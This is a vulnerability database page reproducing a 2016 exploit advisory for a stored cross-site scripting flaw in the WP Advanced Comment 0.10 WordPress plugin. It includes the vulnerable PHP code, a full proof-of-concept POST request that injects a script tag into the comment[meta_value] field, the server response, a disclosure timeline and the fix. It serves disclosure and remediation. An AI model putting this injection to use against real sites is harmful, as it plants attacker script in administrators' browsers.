Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Advanced Comment 0.10 Plugin - Persistent Cross-Site Scripting

🗓️ 10 Mar 2016 00:00:00Reported by Mohammad KhaleghiType 
zdt
 zdt🔗 0day.today👁 61 Views

WordPress WP Advanced Comment 0.10 Plugin has persistent cross-site scripting vulnerability visible to admin. Attacker can change the "name=comment[meta_value]" parameter in "comment-form.php" file

Code
1. Introduction
 
 
# Exploit Title: WordPress WP Advanced Comment 0.10 Persistent XSS 
# Date: Mar.09.2016 
# Exploit Author: Mohammad Khaleghi 
# Contact: https://twitter.com/_blackmatrix 
# Vendor: Ravi Shakya 
# Tested On: Apache2.2 / PHP5 / Kali 64 / WordPress 4.4.1 
# Category: Webapps 
# Software Link: https://wordpress.org/support/plugin/wp-advance-comment 
 
 
 
2. Description
 
WP Advanced Comment 0.10 plugin does not have XSS protection, which means that an attacker can change the POST request , value of " name="comment[meta_value]" " parameter , it's not escaped . XSS is visible for admin
 
File : wp-content\plugins\wp-advance-comment\shortcodes\comment-form.php
 
 
<!-- Show Comments -->
 
<?php
 
    if( $option[$id]['other']['comment_position'] == 1 ){
 
        echo $this->show_like_dislike_button( $value['comment_ID'] , 
        $option[$id]['other'] , 'top' );
 
        echo '<p>'.$value['comment_content'].'</p>';
 
        echo $this->show_like_dislike_button( $value['comment_ID'] , 
        $option[$id]['other'] , 'bottom' );
 
}?>
 
<!-- Get the comment meta -->     
 
<?php
 
    $data = get_option( 'wpad_comment_form' );
 
    if( !empty( $data[$id] ) ): 
?>
 
<div class="wpad_comment_meta">
     <ul>
      <?php
      foreach( $data[$id] as $key => $value1 ){
      $show_admin = isset($value1['show_admin']) ? 
      $value1['show_admin'] : 0; $privelage = $this->check_administrator( $show_admin );
  
          if ( !empty( $value1['meta_key'] ) && is_numeric( $key ) && $value1['meta_key'] != 'user_name' && $value1
           ['meta_key'] != 'user_email' && $value1['custom_field'] != 'user_image' && 
           $value1['meta_key'] != 'wpad_comment' && $privelage == true )  {
 
           $meta_key = $value1['meta_key'];
           $label = $value1['label'];
 
           $meta_value = get_comment_meta( $value['comment_ID'] , 
           $meta_key , true ); if( !empty( $meta_value ) ) {
 
        if( $value1['custom_field'] == 'radio' ) {
 
            $radio_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'radio' ); 
            $this->display_comment_metas_frontend( $label , $radio_value );
            } 
            elseif ( $value1['custom_field'] == 'checkbox' ) {
 
               $check_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'checkbox'); 
               $this->display_comment_metas_frontend( $label , $check_value ); } 
            else {
                $this->display_comment_metas_frontend( $label , $meta_value );
                   }
 
            }
        }
    }
 
    ?>
    </ul>
            </div>
 
<?php endif; ?>
 
<!-- Show Comments -->
  
 
3. Proof of Concept
 
Request :
__________________________________________________________________________
 
Host=127.0.0.1:8080
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept=*/*
X-Requested-With=XMLHttpRequest
Referer=http://127.0.0.1:8080/wordpress/2016/02/02/hello-world/
Content-Length=1399
Content-Type=multipart/form-data;
boundary=---------------------------23741051518289624461916684164
 
Cookie=wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C5a52d446b3c1782856a5021a38e5b1431297eca6fa81946694ebfdf305 994a84; wordpress_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7Cfeedc6beb6fc4d7fc7719fd1e45666b270f598a8294df146742750fd43 2ca5b3; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C80f4e9b382b8b316ba8967a1651ea91cecc45300c13c754f528a17ade8 475032; wp-settings-time-1=1454782581; wp-settings-time-2=1454752438; wordpress_logged_in_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7C8ff14befe34a2a5f1c4c6d93123e6afce4af2c43272a0351f2ce9b1499 1c180f; wordpress_test_cookie=WP+Cookie+check
 
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
 
POSTDATA =-----------------------------23741051518289624461916684164
 
Content-Disposition: form-data; name="action"
 
wpad_save_comment
 
-----------------------------
 
23741051518289624461916684164 Content-Disposition: form-data; name="post_id"
  
 
1
 
-----------------------------
 
23741051518289624461916684164 Content-Disposition: form-data; name="form_id"
 
417
 
-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="email_me_on_approve"
 
undefined
 
-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_value]"
 
bourne
 
-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_key]"
 
user_name
 
-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_value]"
 
[email protected]
 
-----------------------------
 
23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_key]"
 
user_email
 
-----------------------------
 
23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_value]"
 
Hack <script>alert("Hacked")</script>
 
-----------------------------
23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_key]"
 
comment
 
-----------------------------
23741051518289624461916684164--
  
 
Response
______________________________________________________________________
 
Status=OK - 200
Date=Sat, 06 Feb 2016 18:18:43 GMT 
Server=Apache X-Frame-Options=SAMEORIGIN, SAMEORIGIN X-Powered-By=PHP/5.5.29 X-Robots-Tag=noindex x-content-type-options=nosniff Expires=Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control=no-cache, must-revalidate, max-age=0 Pragma=no-cache
Content-Length=7 
Keep-Alive=timeout=5, max=100 
Connection=Keep-Alive 
Content-Type=text/html; charset=UTF-8
 
 
 
4. Report Timeline
 
09-03-2016 : Discovered
09-03-2016 : Vendor notified
09-03-2016 : Vendor Responded 
09-03-2016 : Vendor fixed the problem
 
 
5. Solution
 
Update to version 0.11

#  0day.today [2018-02-27]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2016 00:00Current
7.1High risk
Vulners AI Score7.1
wordpressadvanced comment pluginpersistent xsscross-site scriptingvulnerabilityadminsecurity
61